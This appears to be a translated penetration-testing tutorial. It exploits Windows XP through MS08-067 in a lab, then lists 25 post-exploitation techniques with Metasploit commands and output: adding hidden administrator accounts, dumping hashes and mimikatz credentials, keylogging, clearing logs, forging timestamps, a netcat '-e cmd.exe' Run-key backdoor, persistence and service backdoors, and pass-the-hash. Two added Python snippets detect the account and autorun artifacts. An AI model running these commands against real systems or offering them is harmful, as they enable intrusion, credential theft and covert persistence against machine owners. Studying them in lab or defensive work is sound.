Penetration Testing: 25 Post-Exploitation Techniques
Using MS08-067 as the worked example, this article records the common post-exploitation techniques, from basic information gathering through to planting backdoors.
0. Lab environment
Subnet: 192.168.155.0/24
NIC mode: NAT
Attacker 1 (Kali): 192.168.155.2
Attacker 2 (macOS): 192.168.155.1
Target 1 (Windows XP SP3, English): 192.168.155.18
Target 2 (Windows 7): 192.168.155.19
1. MS08-067 vulnerability description [RPC]
Microsoft Windows Server service RPC request buffer overflow. The Windows Server service contains a buffer overflow in its handling of specially crafted RPC requests; a remote attacker can trigger it by sending a malicious RPC request and completely compromise the system, executing arbitrary code with SYSTEM privileges.
On Windows 2000, XP and Server the vulnerability can be exploited without authentication; on Windows Vista and Server, authentication may be required.
/en-us/security-updates/securitybulletins//ms08-067 [official description]
2. Host discovery
nmap -F 192.168.155.0/24
Starting Nmap 7.91 ( ) at -05-03 03:50 EDT
Nmap scan report for 192.168.155.1
Host is up (0.00084s latency).
Not shown: 97 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
5000/tcp  open  upnp
49152/tcp open  unknown
MAC Address: FA:FF:C2:C2:93:64 (Unknown)

Nmap scan report for 192.168.155.18
Host is up (0.0018s latency).
Not shown: 93 closed ports
PORT     STATE SERVICE
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
MAC Address: 00:0C:29:50:ED:13 (VMware)

Nmap scan report for 192.168.155.2
Host is up (0.0000060s latency).
All 100 scanned ports on 192.168.155.2 are closed

Nmap done: 256 IP addresses (3 hosts up) scanned in 2.23 seconds
Target host IP: 192.168.155.18
Open ports:
PORT     STATE SERVICE
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
MAC Address: 00:0C:29:50:ED:13 (VMware)
Target port: 445
Service: microsoft-ds
3. Exploiting the target through MS08-067 with MSF
msfconsole
search ms08-067
msf6 > use exploit/windows/smb/ms08_067_netapi
show targets
set target 0
set RHOSTS 192.168.155.18
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
exploit
[*] Started reverse TCP handler on 192.168.155.2:4444
[*] 192.168.155.18:445 - Automatically detecting the target...
[*] 192.168.155.18:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.155.18:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.155.18:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.155.18
[*] Meterpreter session 1 opened (192.168.155.2:4444 -> 192.168.155.18:1074) at -05-03 04:42:05 -0400
4. Post-exploitation
4.1 System information gathering
The information-gathering scripts live in the directories below; only a few examples are shown here.
/usr/share/metasploit-framework/modules/post/windows/gather
/usr/share/metasploit-framework/modules/post/linux/gather
(1) Basic system information
meterpreter > sysinfo
Computer        : DH-CA8822AB9589
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
If the target is an SP2 system, it will carry a large number of vulnerabilities, since Microsoft no longer maintains it.
(2) Is the target a virtual machine?
meterpreter > run post/windows/gather/checkvm
[*] Checking if DH-CA8822AB9589 is a Virtual Machine ...
[+] This is a VMware Virtual Machine
(3) Disk partitions
meterpreter > run post/windows/gather/forensics/enum_drives
Device Name:           Type:  Size (bytes):
-----------------      -----  -------------
<Physical Drives:>
\\.\PhysicalDrive0            4702111234474983745
<Logical Drives:>
\\.\A:                        4702111234474983745
\\.\C:                        4702111234474983745
\\.\D:                        4702111234474983745
(4) Installed software on the target
meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on DH-CA8822AB9589

Installed Applications
======================

 Name                                 Version
 ----                                 -------
 Adobe Reader 9                       9.0.0
 KingView 6.53                        6.53
 KingView Driver                      6.53
 Microsoft Office Standard Edition    11.0.8173.0
 Sentinel Protection Installer 7.5.0  7.5.0
 VMware Tools                         8.1.4.11056
 WebFldrs XP                          9.50.7523

[+] Results stored in: /root/.msf4/loot/0505234757_default_192.168.155.18_host.application_805792.txt
(5) Other information gathering
run post/windows/gather/dumplinks              # recent file activity (LNK files)
run post/linux/gather/checkvm                  # virtual machine check (Linux)
run post/windows/gather/checkvm                # virtual machine check (Windows)
run post/windows/gather/enum_ie                # IE cache
run post/windows/gather/enum_chrome            # Chrome cache
run post/windows/gather/enum_patches           # installed patches
run post/windows/gather/forensics/enum_drives  # partitions
run post/windows/gather/enum_domain            # find the domain controller
run post/windows/gather/enum_applications      # installed software
4.2 Check privileges
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We already hold SYSTEM privileges.
4.3 Enter the target's shell
meterpreter > shell
Process 3980 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
We now have a shell on the target system.
4.4 Add an account
C:\WINDOWS\system32>net user sxk /add
net user sxk /add
The command completed successfully.
4.5 Add the new account to the Administrators group
C:\WINDOWS\system32>net localgroup administrators sxk /add
net localgroup administrators sxk /add
The command completed successfully.
The user has been added to the target's Administrators group.
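From the defender's side, the two net commands above leave Security-log events 4720 (a user account was created) and 4732 (a member was added to a security-enabled local group); those are the IDs on Windows Vista and later, while the XP target in this lab logs the older 624 and 636 instead. The Python below is an added example, not code from the post or from Metasploit: it correlates those two event IDs over constructed sample records, treating creation followed by addition to Administrators or Remote Desktop Users within a short window as high severity and any other addition to those groups as worth review. The event shape (a timestamp, an ID and a field dict), the sample values and the "trailing $ means a computer account acting from a SYSTEM context" heuristic are assumptions; the group SIDs S-1-5-32-544 and S-1-5-32-555 are the real well-known SIDs that 4732 reports.

```python
from datetime import datetime, timedelta

# Well-known local group SIDs; event 4732 names the group by SID, not by display name.
WATCHED_GROUPS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-555": "Remote Desktop Users",
}

# Constructed sample events (hypothetical, not a real log export). Each record is
# (timestamp, event id, fields); the field names mirror those in the real events.
SAMPLE_EVENTS = [
    ("2024-05-03 04:43:10", 4720, {"TargetUserName": "sxk",
                                   "SubjectUserName": "DH-CA8822AB9589$"}),
    ("2024-05-03 04:43:12", 4732, {"MemberName": "DH-CA8822AB9589\\sxk",
                                   "TargetSid": "S-1-5-32-544",
                                   "SubjectUserName": "DH-CA8822AB9589$"}),
    # added to Remote Desktop Users with no creation event inside the window
    ("2024-05-03 04:50:00", 4732, {"MemberName": "DH-CA8822AB9589\\lyl",
                                   "TargetSid": "S-1-5-32-555",
                                   "SubjectUserName": "DH-CA8822AB9589$"}),
    # a routine case: created by an administrator, promoted two days later
    ("2024-05-03 09:15:00", 4720, {"TargetUserName": "svc_backup",
                                   "SubjectUserName": "Administrator"}),
    ("2024-05-05 10:00:00", 4732, {"MemberName": "DH-CA8822AB9589\\svc_backup",
                                   "TargetSid": "S-1-5-32-544",
                                   "SubjectUserName": "Administrator"}),
    # an unrelated event id that the correlator must ignore
    ("2024-05-03 04:44:00", 4624, {"TargetUserName": "client"}),
]


def _parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")


def correlate_new_group_members(events, window=timedelta(minutes=10)):
    """Return one alert per 4732 addition to a watched group.

    A 4720 for the same account within `window` before the 4732 makes the alert
    high severity (create-then-promote, the pattern of net user / net localgroup
    run back to back). Events are sorted first because logs may arrive out of order.
    """
    created = {}   # account name (lower case) -> creation time
    alerts = []
    for ts_str, event_id, f in sorted(events, key=lambda e: e[0]):
        ts = _parse_ts(ts_str)
        if event_id == 4720:
            created[f["TargetUserName"].lower()] = ts
        elif event_id == 4732 and f.get("TargetSid") in WATCHED_GROUPS:
            account = f["MemberName"].split("\\")[-1].lower()
            recent = account in created and ts - created[account] <= window
            subject = f["SubjectUserName"]
            alerts.append({
                "account": account,
                "group": WATCHED_GROUPS[f["TargetSid"]],
                "by": subject,
                "severity": "high" if recent else "medium",
                # assumption used here: a Subject ending in '$' is the computer
                # account, i.e. the change came from a SYSTEM-level context rather
                # than from a logged-on administrator
                "from_system_context": subject.endswith("$"),
                "at": ts_str,
            })
    return alerts


if __name__ == "__main__":
    for a in correlate_new_group_members(SAMPLE_EVENTS):
        print(f"[{a['severity']:6}] {a['account']} -> {a['group']} by {a['by']} at {a['at']}")
```

Run stand-alone it prints three alerts; only the sxk one is high, because its creation and promotion are two seconds apart and both were performed from the machine account.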
4.6 Screenshot
meterpreter > screenshot
Screenshot saved to: /root/Desktop/YhioHCHD.jpeg
4.7 Upload a file
meterpreter > upload /Users/sxk/MYSHXRuM.jpeg
[*] uploading  : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
[*] Uploaded 260.89 KiB of 260.89 KiB (100.0%): /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
[*] uploaded   : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
meterpreter > pwd
C:\Windows\system32
The file was uploaded to the target's C: drive (with no destination given, upload writes into the current directory, C:\Windows\system32).
4.8 Download a file
meterpreter > download drivers/etc/hosts
[*] Downloading: drivers/etc/hosts -> /Users/xiaokaisi/hosts
[*] Downloaded 854.00 B of 854.00 B (100.0%): drivers/etc/hosts -> /Users/xiaokaisi/hosts
[*] download   : drivers/etc/hosts -> /Users/xiaokaisi/hosts
The target's hosts file was downloaded.
4.9 Dump password hashes
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
client:1000:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Hashes to crack:
259745cb123a52aa2e693aaacca2db52
31d6cfe0d16ae931b73c59d7e0c089c0
Note that 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, and aad3b435b51404eeaad3b435b51404ee in the LM field means no LM hash is stored; Administrator and Guest therefore have blank passwords here, and only the client hash needs cracking.
4.10 Webcam
meterpreter > webcam_list      # list webcams
[-] No webcams were found
meterpreter > webcam_snap      # take a photo with the webcam
[-] Target does not have a webcam
meterpreter > webcam_stream    # stream video from the webcam
[-] Target does not have a webcam
4.11 Keystroke capture
To capture the keystrokes of, say, the Administrator user, the session must first be migrated into one of Administrator's processes; running as SYSTEM it cannot capture Administrator's keystrokes.
Start capture with keyscan_start, export what has been captured with keyscan_dump, and only run keyscan_stop once you no longer want to capture. The order is not keyscan_stop followed by keyscan_dump.
(1) Use ps to find a suitable process and migrate into it
meterpreter > ps
3668  3608  explorer.exe    [the usual choice]
meterpreter > migrate 3668
[*] Migrating from 1048 to 3668...
[*] Migration completed successfully.
meterpreter > getuid
Server username: client-PC\client
(2) Capture keystrokes
meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
Dumping captured keystrokes...
wo shi client ,<Shift>Ilove china<CR>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
The keystrokes of the user on the target were captured: "wo shi client ,Ilove china".
4.12 Disable the target's keyboard or mouse
uictl [enable/disable] [keyboard/mouse/all]   # enable or disable keyboard/mouse
uictl disable keyboard                         # disable the keyboard
uictl disable mouse                            # disable the mouse
4.13 Clear logs
Clears the Windows Application, System and Security event logs.
clearev
Clearing the Security log itself leaves a trace: Windows writes event ID 1102 ("The audit log was cleared") as the first entry of the freshly emptied log.
4.14 Find files
meterpreter > cd C:\\
meterpreter > pwd
C:\
search -f *hosts*
4.15 Forge timestamps
meterpreter > pwd
C:\Inetpub\wwwroot
meterpreter > ls
Listing: C:\Inetpub\wwwroot
===========================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  342    fil   2001-07-21 14:22:32 +0800  help.gif
100666/rw-rw-rw-  1898   fil   2001-08-10 14:19:20 +0800  iisstart.asp
100666/rw-rw-rw-  8923   fil   2001-08-10 14:19:20 +0800  localstart.asp
100666/rw-rw-rw-  356    fil   2001-07-21 14:22:32 +0800  mmc.gif
100666/rw-rw-rw-  2806   fil   2001-07-21 14:22:32 +0800  pagerror.gif
100666/rw-rw-rw-  1046   fil   2001-07-21 14:22:32 +0800  print.gif
100666/rw-rw-rw-  1577   fil   2001-07-21 14:22:32 +0800  warning.gif
100666/rw-rw-rw-  1182   fil   2001-07-21 14:22:32 +0800  web.gif
100666/rw-rw-rw-  11946  fil   2001-07-21 14:22:32 +0800  winxp.gif
(1) View the timestamps
meterpreter > timestomp -v help.gif
[*] Showing MACE attributes for help.gif
Modified      : 2001-07-21 14:22:32 +0800
Accessed      : -09-28 11:40:15 +0800
Created       : -09-28 11:40:15 +0800
Entry Modified: -09-28 11:40:28 +0800
meterpreter > timestomp -v iisstart.asp
[*] Showing MACE attributes for iisstart.asp
Modified      : 2001-08-10 14:19:20 +0800
Accessed      : -09-28 11:40:15 +0800
Created       : -09-28 11:40:15 +0800
Entry Modified: -09-28 11:40:28 +0800
(2) Copy help.gif's timestamps onto iisstart.asp
The timestamps of iisstart.asp have now been altered. From the forensic side, timestomp rewrites the $STANDARD_INFORMATION timestamps that Explorer and timestomp -v display; the $FILE_NAME timestamps held in the file's NTFS MFT record are not touched, so comparing the two attributes still reveals the change.
4.16 Target network information
ipconfig / ifconfig   # IP configuration
netstat -ano          # network connections and listening ports
arp                   # ARP cache
getproxy              # proxy settings
route                 # routing table
4.17 Add a route to the target network and scan through it
(1) ARP scan
(2) Port scan
4.18 Dump passwords with mimikatz/kiwi
meterpreter > creds_wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
DH-CA8822AB9589$  WORKGROUP        (null)
sxk               DH-CA8822AB9589
The user's password was retrieved.
meterpreter > kiwi_cmd sekurlsa::logonPasswords
4.19 Remote desktop
List the available desktops:
enumdesktops
Show the desktop the current Meterpreter session is attached to:
meterpreter > getdesktop
Session 0\S\D
(1) Enable Remote Desktop and add a user
The script is at
/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
Reading enable_rdp.rb shows how it works: RDP is enabled by editing the registry with reg; the user is added by invoking cmd.exe with net user; port forwarding uses the portfwd command.
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/0506025923_default_192.168.155.18_host.windows.cle_712463.txt
Add a user:
run post/windows/manage/enable_rdp USERNAME=lyl PASSWORD=123456
[*] Enabling Remote Desktop
[*]     RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]     Terminal Services service is already set to auto
[*]     Opening port in local firewall if necessary
[*] Setting user account for logon
[*]     Adding User: lyl with Password: 123456
[*]     Adding User: lyl to local group 'Remote Desktop Users'
[*]     Hiding user from Windows Login screen
[*]     Adding User: lyl to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/0506030102_default_192.168.155.18_host.windows.cle_669035.txt
Set up port forwarding:
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662
[*] Enabling Remote Desktop
[*]     RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]     Terminal Services service is already set to auto
[*]     Opening port in local firewall if necessary
[*] Starting the port forwarding at local port 6662
[*] Local TCP relay created: 0.0.0.0:6662 <-> 127.0.0.1:3389
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/0506030321_default_192.168.155.18_host.windows.cle_270181.txt
(2) Connect over RDP to control the target
rdesktop 127.0.0.1:6662
4.20 Capture the target's network traffic
meterpreter > use sniffer
Loading extension sniffer...Success.
meterpreter > sniffer_interfaces
1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)
meterpreter > sniffer_stats 1
[*] Capture statistics for interface 1
	packets: 18
	bytes: 1098
meterpreter > sniffer_dump 1 /tmp/msf-sniffer-test.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 139 packets (12986 bytes)
[*] Downloaded 100% (12986/12986)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/msf-sniffer-test.pcap
meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
[*] There are 12 packets (732 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
The figure shows the packets captured from the target host.
4.21 Plant a backdoor through the registry
(1) Upload nc
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
[*] uploading  : /usr/share/windows-binaries/nc.exe -> C:\windows\system32
[*] uploaded   : /usr/share/windows-binaries/nc.exe -> C:\windows\system32\nc.exe
(2) Enumerate the keys under Run
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Keys (1):

	OptionalComponents

  Values (4):

	VMware Tools
	VMware User Process
	ICQ Lite
	Adobe Reader Speed Launcher

meterpreter >
(3) Set a value
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v msf_test_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
Successfully set msf_test_nc of REG_SZ.
(4) Query the value
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v msf_test_nc
Key: HKLM\software\microsoft\windows\currentversion\run
Name: msf_test_nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe
(5) Access the backdoor
The backdoor has been planted successfully.
4.22 Token manipulation
(1) Token impersonation
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > help incognito
List the available tokens:
meterpreter > list_tokens -u
Impersonate the DH-CA8822AB9589\sxk token:
impersonate_token 'DH-CA8822AB9589\sxk'
Run cmd with the impersonated token:
execute -f cmd.exe -i -t
Revert to the original token:
rev2self
meterpreter > getuid
Server username: DH-CA8822AB9589\sxk
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
(2) Token stealing
ps
Steal the token from a given process:
meterpreter > steal_token 1648
Stolen token with username: DH-CA8822AB9589\sxk
meterpreter > getuid
Server username: DH-CA8822AB9589\sxk
Drop the stolen token:
meterpreter > drop_token
Relinquished token, now running as: NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
4.23 Hash abuse
(1) Obtain the hashes
Dump password hashes from the SAM (requires SYSTEM privileges):
meterpreter > run post/windows/gather/smart_hashdump
(2) Pass the hash
Once user hashes have been obtained with smart_hashdump, the psexec module can be used for a pass-the-hash attack.
Prerequisites: (1) port 445 / the SMB service is open; (2) the admin$ share is enabled.
The procedure is as follows.
msf > use exploit/windows/smb/psexec
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.155.2
msf > set LPORT 4443
msf > set RHOST 192.168.155.18
msf > set SMBUser Administrator
msf > set SMBPass aad3b4*****04ee:5b5f00*****c424c
msf > set SMBDomain WORKGROUP   # domain accounts need SMBDomain set
msf > exploit
4.24 Planting backdoors
Metasploit's built-in backdoors start in one of two ways: from a startup entry (persistence) or as a service (metsvc); persistence_exe can additionally turn a custom file into a backdoor.
(1) persistence startup-entry backdoor
A VBS script is uploaded to C:\Users***\AppData\Local\Temp\
and a startup entry is added under HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
meterpreter > run persistence -X -i 5 -p 6667 -r 192.168.155.2
Connect to the backdoor:
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.155.2
msf > set LPORT 6667
msf > exploit
(2) metsvc service backdoor
Three files (metsrv.x86.dll, metsvc-server.exe, metsvc.exe) are uploaded to C:\Users***\AppData\Local\Temp\ and started as a service named meterpreter.
run metsvc -A
Connect to the backdoor:
msf > use exploit/multi/handler
msf > set payload windows/metsvc_bind_tcp
msf > set RHOST 192.168.155.18
msf > set LPORT 31337
msf > exploit
Connected to the backdoor.
At this point we have planted three backdoors on the target system.
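The three backdoors from 4.21 and 4.24 all leave one of two durable artifacts: a value under HKLM\...\CurrentVersion\Run (the nc listener, the persistence VBS) or an installed service (metsvc, service name meterpreter) whose binaries sit under a user's Temp directory. The Python below is an added example, not code from the post or from Metasploit: an autorun audit that runs over a constructed inventory of Run values and services and flags the traits those backdoors share, namely netcat launched with -e, a script host pointing at a file in Temp, a service binary under Temp, or the service name meterpreter. The inventory shape and the sample entries (including the benign VMware and Adobe ones modelled on the post's listing) are assumptions; on a live host you would fill it from reg query and the service control manager.

```python
import re

# Constructed sample inventory (hypothetical; shaped like `reg query ...\Run` output
# and a service listing, not a real export). The benign entries mirror names in the post.
SAMPLE_RUN_VALUES = {
    "VMware Tools": r'"C:\Program Files\VMware\VMware Tools\VMwareTray.exe"',
    "Adobe Reader Speed Launcher": r'"C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"',
    "msf_test_nc": r"C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe",
    "UpdateCheck": r"wscript.exe //B C:\Users\client\AppData\Local\Temp\xYzAbC.vbs",
}
SAMPLE_SERVICES = [
    {"name": "VMTools", "path": r'"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"'},
    {"name": "meterpreter", "path": r"C:\Users\client\AppData\Local\Temp\metsvc.exe"},
]

# netcat (nc/ncat) given -e, which binds a program such as cmd.exe to the socket
NETCAT_EXEC = re.compile(r"(?i)\bnc(?:at)?(?:\.exe)?\b.*\s-e\s")
# a user or system Temp directory, where neither services nor autoruns normally live
TEMP_PATH = re.compile(r"(?i)\\(?:AppData\\Local\\)?Temp\\")
# script and proxy hosts commonly used to launch a dropped script at logon
SCRIPT_HOST = re.compile(r"(?i)\b(?:wscript|cscript|mshta|powershell|rundll32|regsvr32)(?:\.exe)?\b")
SCRIPT_FILE = re.compile(r"(?i)\.(?:vbs|vbe|js|jse|hta|ps1)\b")
# service names that belong to tooling rather than to Windows or a vendor (assumed list)
SUSPECT_SERVICE_NAMES = {"meterpreter"}


def _check_command(cmd):
    """Return the list of suspicious traits found in one command line (empty if none)."""
    reasons = []
    if NETCAT_EXEC.search(cmd):
        reasons.append("netcat started with -e (command shell bound to a socket)")
    if TEMP_PATH.search(cmd):
        reasons.append("target lives in a Temp directory")
    if SCRIPT_HOST.search(cmd) and SCRIPT_FILE.search(cmd):
        reasons.append("script host launching a dropped script")
    return reasons


def audit_autoruns(run_values, services):
    """Return findings for Run values and services that show backdoor traits.

    Each finding carries the source, the entry name, the command line and the
    list of reasons; entries with no reasons are omitted, so a clean inventory
    yields an empty list.
    """
    findings = []
    for name, cmd in run_values.items():
        reasons = _check_command(cmd)
        if reasons:
            findings.append({"source": "Run", "name": name, "command": cmd, "reasons": reasons})
    for svc in services:
        reasons = _check_command(svc["path"])
        if svc["name"].lower() in SUSPECT_SERVICE_NAMES:
            reasons.append("service name associated with attacker tooling")
        if reasons:
            findings.append({"source": "Service", "name": svc["name"],
                             "command": svc["path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_autoruns(SAMPLE_RUN_VALUES, SAMPLE_SERVICES):
        print(f"{f['source']:8} {f['name']}: {f['command']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

Run stand-alone it reports the nc value, the VBS launcher and the meterpreter service and stays silent on the VMware and Adobe entries; the regexes are deliberately narrow so that each reason maps to one concrete artifact a responder can go and look at.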
4.25 Reboot / shutdown
Finally, a simple one.
reboot / shutdown
Reboot or shut down the target machine.